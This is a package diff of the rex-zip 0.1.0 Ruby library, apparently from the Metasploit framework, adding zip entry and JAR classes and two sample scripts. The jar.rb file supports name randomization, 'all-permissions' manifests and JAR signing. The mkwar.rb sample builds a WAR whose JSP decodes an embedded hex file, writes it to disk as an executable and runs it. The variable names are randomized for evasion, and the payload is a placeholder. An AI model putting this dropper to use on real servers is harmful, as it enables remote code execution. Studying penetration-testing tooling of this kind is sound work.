rex-zip 0.1.0

data/lib/rex/zip/entry.rb

@@ -0,0 +1,122 @@
+# -*- coding: binary -*-
+
+module Rex
+module Zip
+
+#
+# An Entry represents a logical file or directory to be stored in an Archive
+#
+class Entry
+
+  attr_accessor :name, :flags, :info, :xtra, :comment, :attrs, :central_dir_name
+  attr_reader :data
+
+  def initialize(fname, data, compmeth, timestamp=nil, attrs=nil, xtra=nil, comment=nil, central_dir_name=nil)
+    @name = fname.unpack("C*").pack("C*")
+    @central_dir_name = (central_dir_name ? central_dir_name.unpack("C*").pack("C*") : nil)
+    @data = data.unpack("C*").pack("C*")
+    @xtra = xtra
+    @xtra ||= ''
+    @comment = comment
+    @comment ||= ''
+    @attrs = attrs
+    @attrs ||= 0
+
+    # XXX: sanitize timestmap (assume now)
+    timestamp ||= Time.now
+    @flags = CompFlags.new(0, compmeth, timestamp)
+
+    if (@data)
+      compress
+    else
+      @data = ''
+      @info = CompInfo.new(0, 0, 0)
+    end
+    @compdata ||= ''
+  end
+
+  def data=(val)
+    @data = val.unpack("C*").pack("C*")
+    compress
+  end
+
+  #
+  # Compress the #data and store it for later use.  If this entry's compression method
+  # produces a larger blob than the original data, the method is changed to CM_STORE.
+  #
+  def compress
+    @crc = Zlib.crc32(@data, 0)
+    case @flags.compmeth
+
+    when CM_STORE
+      @compdata = @data
+
+    when CM_DEFLATE
+      z = Zlib::Deflate.new(Zlib::BEST_COMPRESSION)
+      @compdata = z.deflate(@data, Zlib::FINISH)
+      z.close
+      @compdata = @compdata[2, @compdata.length-6]
+
+    else
+      raise 'Unsupported compression method: %u' % @flags.compmeth
+    end
+
+    # if compressing doesn't help, just store it
+    if (@compdata.length > @data.length)
+      @compdata = @data
+      @flags.compmeth = CM_STORE
+    end
+
+    @info = CompInfo.new(@crc, @compdata.length, @data.length)
+  end
+
+
+  def relative_path
+    get_relative_path(@name)
+  end
+
+  def central_dir_path
+    return nil if @central_dir_name.to_s.strip.empty?
+    get_relative_path(@central_dir_name)
+  end
+
+
+  #
+  # Return the compressed data in a format suitable for adding to an Archive
+  #
+  def pack
+    #  - lfh 1
+    lfh = LocalFileHdr.new(self)
+    ret = lfh.pack
+
+    #  - data 1
+    if (@compdata)
+      ret << @compdata
+    end
+
+    if (@gpbf & GPBF_USE_DATADESC)
+      #  - data desc 1
+      dd = DataDesc.new(@info)
+      ret << dd.pack
+    end
+
+    ret
+  end
+
+  def inspect
+    "#<#{self.class} name:#{name}, data:#{@data.length} bytes>"
+  end
+
+  private
+
+  def get_relative_path(path)
+    if (path[0,1] == '/')
+      return path[1, path.length]
+    end
+    path
+  end
+
+end
+
+end
+end

data/lib/rex/zip/jar.rb

@@ -0,0 +1,283 @@
+# -*- coding: binary -*-
+
+require 'rex/zip/archive'
+
+module Rex
+module Zip
+
+#
+# A Jar is a zip archive containing Java class files and a MANIFEST.MF listing
+# those classes.  Several variations exist based on the same idea of class
+# files inside a zip, most notably:
+# - WAR files store XML files, Java classes, JSPs and other stuff for
+#   servlet-based webservers (e.g.: Tomcat and Glassfish)
+# - APK files are Android Package files
+#
+class Jar < Archive
+  attr_accessor :manifest
+  # @!attribute [rw] substitutions
+  #   The substitutions to apply when randomizing. Randomization is designed to
+  #   be used in packages and/or classes names.
+  #
+  #   @return [Hash]
+  attr_accessor :substitutions
+
+  def initialize
+    @substitutions = {}
+    super
+  end
+
+  #
+  # Create a MANIFEST.MF file based on the current Archive#entries.
+  #
+  # See http://download.oracle.com/javase/1.4.2/docs/guide/jar/jar.html for
+  # some explanation of the format.
+  #
+  # Example MANIFEST.MF
+  #   Manifest-Version: 1.0
+  #   Main-Class: metasploit.Payload
+  #
+  #   Name: metasploit.dat
+  #   SHA1-Digest: WJ7cUVYUryLKfQFmH80/ADfKmwM=
+  #
+  #   Name: metasploit/Payload.class
+  #   SHA1-Digest: KbAIMttBcLp1zCewA2ERYkcnRU8=
+  #
+  # The SHA1-Digest lines are optional unless the jar is signed (see #sign).
+  #
+  def build_manifest(opts={})
+    main_class = (opts[:main_class] ? randomize(opts[:main_class]) : nil)
+    app_name = (opts[:app_name] ? randomize(opts[:app_name]) : nil)
+    existing_manifest = nil
+    meta_inf_exists = @entries.find_all{|item| item.name == 'META-INF/' }.length > 0
+
+    @manifest =  "Manifest-Version: 1.0\r\n"
+    @manifest << "Main-Class: #{main_class}\r\n" if main_class
+    @manifest << "Application-Name: #{app_name}\r\n" if app_name
+    @manifest << "Permissions: all-permissions\r\n"
+    @manifest << "\r\n"
+    @entries.each { |e|
+      next if e.name =~ %r|/$|
+      if e.name == "META-INF/MANIFEST.MF"
+        existing_manifest = e
+        next
+      end
+      #next unless e.name =~ /\.class$/
+      @manifest << "Name: #{e.name}\r\n"
+      #@manifest << "SHA1-Digest: #{Digest::SHA1.base64digest(e.data)}\r\n"
+      @manifest << "\r\n"
+    }
+    if existing_manifest
+      existing_manifest.data = @manifest
+    else
+      add_file("META-INF/", '') unless meta_inf_exists
+      add_file("META-INF/MANIFEST.MF", @manifest)
+    end
+  end
+
+  def to_s
+    pack
+  end
+
+  #
+  # Length of the *compressed* blob
+  #
+  def length
+    pack.length
+  end
+
+  #
+  # Add multiple files from an array
+  #
+  # +files+ should be structured like so:
+  #   [
+  #     [ "path", "to", "file1" ],
+  #     [ "path", "to", "file2" ]
+  #   ]
+  # and +path+ should be the location on the file system to find the files to
+  # add.  +base_dir+ will be prepended to the path inside the jar.
+  #
+  # Example:
+  #   war = Rex::Zip::Jar.new
+  #   war.add_file("WEB-INF/", '')
+  #   war.add_file("WEB-INF/web.xml", web_xml)
+  #   war.add_file("WEB-INF/classes/", '')
+  #   files = [
+  #     [ "servlet", "examples", "HelloWorld.class" ],
+  #     [ "Foo.class" ],
+  #     [ "servlet", "Bar.class" ],
+  #   ]
+  #   war.add_files(files, "./class_files/", "WEB-INF/classes/")
+  #
+  # The above code would create a jar with the following structure from files
+  # found in ./class_files/ :
+  #
+  #   +- WEB-INF/
+  #     +- web.xml
+  #     +- classes/
+  #       +- Foo.class
+  #       +- servlet/
+  #         +- Bar.class
+  #         +- examples/
+  #           +- HelloWorld.class
+  #
+  def add_files(files, path, base_dir="")
+    files.each do |file|
+      # Add all of the subdirectories if they don't already exist
+      1.upto(file.length - 1) do |idx|
+        full = base_dir + file[0,idx].join("/") + "/"
+        if !(entries.map{|e|e.name}.include?(full))
+          add_file(full, '')
+        end
+      end
+      # Now add the actual file, grabbing data from the filesystem
+      fd = File.open(File.join( path, file ), "rb")
+      data = fd.read(fd.stat.size)
+      fd.close
+      add_file(base_dir + file.join("/"), data)
+    end
+  end
+
+  #
+  # Add a signature to this jar given a +key+ and a +cert+.  +cert+ should be
+  # an instance of OpenSSL::X509::Certificate and +key+ is expected to be an
+  # instance of one of OpenSSL::PKey::DSA or OpenSSL::PKey::RSA.
+  #
+  # This method aims to create signature files compatible with the jarsigner
+  # tool destributed with the JDK and any JVM should accept the resulting
+  # jar.
+  #
+  # === Signature contents
+  # Modifies the META-INF/MANIFEST.MF entry adding SHA1-Digest attributes in
+  # each Name section.  The signature consists of two files, a .SF and a .DSA
+  # (or .RSA if signing with an RSA key).  The .SF file is similar to the
+  # manifest with Name sections but the SHA1-Digest is not optional.  The
+  # difference is in what gets hashed for the SHA1-Digest line -- in the
+  # manifest, it is the file's contents, in the .SF, it is the file's section
+  # in the manifest (including trailing newline!).  The .DSA/.RSA file is a
+  # PKCS7 signature of the .SF file contents.
+  #
+  # === Links
+  # A short description of the format:
+  # http://download.oracle.com/javase/1.4.2/docs/guide/jar/jar.html#Signed%20JAR%20File
+  #
+  # Some info on importing a private key into a keystore which is not
+  # directly supported by keytool for some unfathomable reason
+  # http://www.agentbob.info/agentbob/79-AB.html
+  #
+  def sign(key, cert, ca_certs=nil)
+    m = self.entries.find { |e| e.name == "META-INF/MANIFEST.MF" }
+    raise RuntimeError.new("Jar has no manifest") unless m
+
+    ca_certs ||= [ cert ]
+
+    new_manifest = ''
+    sigdata =  "Signature-Version: 1.0\r\n"
+    sigdata << "Created-By: 1.6.0_18 (Sun Microsystems Inc.)\r\n"
+    sigdata << "\r\n"
+
+    # Grab the sections of the manifest
+    files = m.data.split(/\r?\n\r?\n/)
+    if files[0] =~ /Manifest-Version/
+      # keep the header as is
+      new_manifest << files[0]
+      new_manifest << "\r\n\r\n"
+      files = files[1,files.length]
+    end
+
+    # The file sections should now look like this:
+    #  "Name: metasploit/Payload.class\r\nSHA1-Digest: KbAIMttBcLp1zCewA2ERYkcnRU8=\r\n\r\n"
+    files.each do |f|
+      next unless f =~ /Name: (.*)/
+      name = $1
+      e = self.entries.find { |e| e.name == name }
+      if e
+        digest = OpenSSL::Digest::SHA1.digest(e.data)
+        manifest_section =  "Name: #{name}\r\n"
+        manifest_section << "SHA1-Digest: #{[digest].pack('m').strip}\r\n"
+        manifest_section << "\r\n"
+
+        manifest_digest = OpenSSL::Digest::SHA1.digest(manifest_section)
+
+        sigdata << "Name: #{name}\r\n"
+        sigdata << "SHA1-Digest: #{[manifest_digest].pack('m')}\r\n"
+        new_manifest << manifest_section
+      end
+    end
+
+    # Now overwrite with the new manifest
+    m.data = new_manifest
+
+    flags = 0
+    flags |= OpenSSL::PKCS7::BINARY
+    flags |= OpenSSL::PKCS7::DETACHED
+    # SMIME and ATTRs are technically valid in the signature but they
+    # both screw up the java verifier, so don't include them.
+    flags |= OpenSSL::PKCS7::NOSMIMECAP
+    flags |= OpenSSL::PKCS7::NOATTR
+
+    signature = OpenSSL::PKCS7.sign(cert, key, sigdata, ca_certs, flags)
+    sigalg = case key
+      when OpenSSL::PKey::RSA; "RSA"
+      when OpenSSL::PKey::DSA; "DSA"
+      # Don't really know what to do if it's not DSA or RSA.  Can
+      # OpenSSL::PKCS7 actually sign stuff with it in that case?
+      # Regardless, the java spec says signatures can only be RSA,
+      # DSA, or PGP, so just assume it's PGP and hope for the best
+      else; "PGP"
+      end
+
+    # SIGNFILE is the default name in documentation.  MYKEY is probably
+    # more common, though because that's what keytool defaults to.  We
+    # can probably randomize this with no ill effects.
+    add_file("META-INF/SIGNFILE.SF", sigdata)
+    add_file("META-INF/SIGNFILE.#{sigalg}", signature.to_der)
+
+    return true
+  end
+
+  # Adds a file to the JAR, randomizing the file name
+  # and the contents.
+  #
+  # @see Rex::Zip::Archive#add_file
+  def add_file(fname, fdata=nil, xtra=nil, comment=nil)
+    super(randomize(fname), randomize(fdata), xtra, comment)
+  end
+
+  # Adds a substitution to have into account when randomizing. Substitutions
+  # must be added immediately after {#initialize}.
+  #
+  # @param str [String] String to substitute. It's designed to randomize
+  #   class and/or package names.
+  # @param bad [String] String containing bad characters to avoid when
+  #   applying substitutions.
+  # @return [String] The substitution which will be used when randomizing.
+  def add_sub(str, bad = '')
+    if @substitutions.key?(str)
+      return @substitutions[str]
+    end
+
+    @substitutions[str] = Rex::Text.rand_text_alpha(str.length, bad)
+  end
+
+  # Randomizes an input by applying the `substitutions` available.
+  #
+  # @param str [String] String to randomize.
+  # @return [String] The input `str` with all the possible `substitutions`
+  #   applied.
+  def randomize(str)
+    return str if str.nil?
+
+    random = str
+
+    @substitutions.each do |orig, subs|
+      random = str.gsub(orig, subs)
+    end
+
+    random
+  end
+
+end
+
+end
+end

data/lib/rex/zip/samples/comment.rb

@@ -0,0 +1,32 @@
+# -*- coding: binary -*-
+
+#
+# Create a zip file with comments!
+#
+
+msfbase = __FILE__
+while File.symlink?(msfbase)
+  msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
+end
+inc = File.dirname(msfbase) + '/../../..'
+$:.unshift(inc)
+
+require 'rex/zip'
+
+# example usage
+zip = Rex::Zip::Archive.new
+zip.add_file("elite.txt", "A" * 1024, nil, %Q<
+                                 +---------------+
+                                 | file comment! |
+                                 +---------------+
+>)
+zip.set_comment(%Q<
+
++------------------------------------------+
+|                                          |
+| Hello!  This is the Zip Archive comment! |
+|                                          |
++------------------------------------------+
+
+>)
+zip.save_to("lolz.zip")

data/lib/rex/zip/samples/mkwar.rb

@@ -0,0 +1,138 @@
+# -*- coding: binary -*-
+
+#
+# Create a WAR archive!
+#
+
+msfbase = __FILE__
+while File.symlink?(msfbase)
+  msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
+end
+inc = File.dirname(msfbase) + '/../../..'
+$:.unshift(inc)
+
+
+require 'rex/zip'
+
+
+def rand_text_alpha(len)
+  buff = ""
+
+  foo = []
+  foo += ('A' .. 'Z').to_a
+  foo += ('a' .. 'z').to_a
+
+  # Generate a buffer from the remaining bytes
+  if foo.length >= 256
+    len.times { buff << Kernel.rand(256) }
+  else
+    len.times { buff << foo[ rand(foo.length) ] }
+  end
+
+  return buff
+end
+
+
+exe = "exe " * 1024
+var_payload = "var_payload"
+var_name = "var_name"
+
+
+zip = Rex::Zip::Archive.new
+
+# begin meta-inf/
+minf = [ 0xcafe, 0x0003 ].pack('Vv')
+zip.add_file('META-INF/', nil, minf)
+# end meta-inf/
+
+# begin meta-inf/manifest.mf
+mfraw = "Manifest-Version: 1.0\r\nCreated-By: 1.6.0_17 (Sun Microsystems Inc.)\r\n\r\n"
+zip.add_file('META-INF/MANIFEST.MF', mfraw)
+# end meta-inf/manifest.mf
+
+# begin web-inf/
+zip.add_file('WEB-INF/', '')
+# end web-inf/
+
+# begin web-inf/web.xml
+webxmlraw = %q{<?xml version="1.0" ?>
+<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
+http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
+version="2.4">
+<servlet>
+<servlet-name>NAME</servlet-name>
+<jsp-file>/PAYLOAD.jsp</jsp-file>
+</servlet>
+</web-app>
+}
+
+webxmlraw.gsub!(/NAME/, var_name)
+webxmlraw.gsub!(/PAYLOAD/, var_payload)
+
+zip.add_file('WEB-INF/web.xml', webxmlraw)
+# end web-inf/web.xml
+
+# begin <payload>.jsp
+var_hexpath       = rand_text_alpha(rand(8)+8)
+var_exepath       = rand_text_alpha(rand(8)+8)
+var_data          = rand_text_alpha(rand(8)+8)
+var_inputstream   = rand_text_alpha(rand(8)+8)
+var_outputstream  = rand_text_alpha(rand(8)+8)
+var_numbytes      = rand_text_alpha(rand(8)+8)
+var_bytearray     = rand_text_alpha(rand(8)+8)
+var_bytes         = rand_text_alpha(rand(8)+8)
+var_counter       = rand_text_alpha(rand(8)+8)
+var_char1         = rand_text_alpha(rand(8)+8)
+var_char2         = rand_text_alpha(rand(8)+8)
+var_comb          = rand_text_alpha(rand(8)+8)
+var_exe           = rand_text_alpha(rand(8)+8)
+var_hexfile       = rand_text_alpha(rand(8)+8)
+var_proc          = rand_text_alpha(rand(8)+8)
+
+jspraw =  "<%@ page import=\"java.io.*\" %>\n"
+jspraw << "<%\n"
+jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"#{var_hexfile}.txt\";\n"
+jspraw << "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n"
+jspraw << "String #{var_data} = \"\";\n"
+
+jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n"
+jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n"
+jspraw << "}\n"
+
+jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n"
+jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n"
+
+jspraw << "int #{var_numbytes} = #{var_inputstream}.available();\n"
+jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n"
+jspraw << "#{var_inputstream}.read(#{var_bytearray});\n"
+jspraw << "#{var_inputstream}.close();\n"
+
+jspraw << "byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\n"
+jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n"
+jspraw << "{\n"
+jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n"
+jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n"
+jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n"
+jspraw << "#{var_comb} <<= 4;\n"
+jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n"
+jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n"
+jspraw << "}\n"
+
+jspraw << "#{var_outputstream}.write(#{var_bytes});\n"
+jspraw << "#{var_outputstream}.close();\n"
+
+jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n"
+jspraw << "%>\n"
+
+zip.add_file("#{var_payload}.jsp", jspraw)
+# end <payload>.jsp
+
+# begin <payload>.txt
+payloadraw = exe.unpack('H*')[0]
+zip.add_file("#{var_hexfile}.txt", payloadraw)
+# end <payload>.txt
+
+
+zip.save_to("test.war")